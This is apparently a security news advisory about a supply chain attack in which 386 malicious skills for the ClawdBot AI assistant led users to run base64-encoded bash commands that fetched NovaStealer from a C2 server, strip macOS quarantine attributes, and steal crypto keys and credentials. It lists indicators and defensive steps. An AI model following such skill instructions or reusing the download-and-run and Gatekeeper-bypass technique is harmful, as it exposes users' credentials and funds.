ClawdBot AI Ecosystem Hit by Massive Supply Chain Attack Distributing NovaStealer
Take action: If you use ClawdBot, be extremely cautious and isolate it. Never run it on a primary computer and only give it very limited access. Be extremely careful of installing third-party skills, especially any related to cryptocurrency trading or web automation. Review your shell history for connections to the malicious IP (91.92.242.30), search your system for the "dx2w5j5bka6qkwxi" binary, and if found, assume your credentials and crypto keys are compromised and rotate them immediately.
Learn More
ClawdBot, an open-source AI personal assistant, is already abused in a large-scale supply chain attack involving 386 malicious skills published to the ClawHub and GitHub registries.
Claude's skills are pre-built instruction manuals/prompt files that contain best practices and step-by-step guidance for specific tasks like creating Word documents, Excel spreadsheets, PowerPoints, and PDFs, which Claude reads before performing those tasks. The ClawdBot ecosystem allows for third parties to upload skills to the skill repository and anyone can download them to their ClawsBot
The campaign primarily targets cryptocurrency traders and developers using platforms such as ByBit, Polymarket, and Axiom, exploiting the trust users place in local AI extensions.
Attackers used multiple aliases, including "hightower6eu" and "aslaep123," to publish skills that appear to automate trading or summarize web content. On macOS, these skills prompt users to run base64-encoded bash commands that download payloads from a command-and-control (C2) server located at 91.92.242.30. These commands frequently use the xattr -c utility to strip quarantine attributes, bypassing Apple's Gatekeeper security. Windows users are tricked into downloading password-protected ZIP files from GitHub releases containing executables disguised as mandatory authentication tools.
The compromised data includes:
- Cryptocurrency exchange API keys and wallet private keys
- Wallet seed phrases and browser extension data (e.g., MetaMask)
- macOS Keychain data and browser-saved passwords
- SSH private keys and cloud provider credentials (AWS, Google Cloud)
- Git credentials and environment configuration files (.env)
The "hightower6eu" account alone recorded over 7,000 downloads before being removed. Security researchers have identified the primary payload as a variant of the NovaStealer malware family.
ClawHub administrator Peter Steinberger acknowledged the platform's current inability to effectively secure the registry against these malicious uploads. Despite the public disclosure, many malicious skills remained available in the official MoltHub GitHub repository for several days.
Users are urged to inspect their shell history for any connections to the malicious C2 infrastructure.
This incident is a reminder of the significant risks inherent in any execution of third-party code that runs on your system with high system privileges. Users can check for infection by searching for the "dx2w5j5bka6qkwxi" binary or related network artifacts.
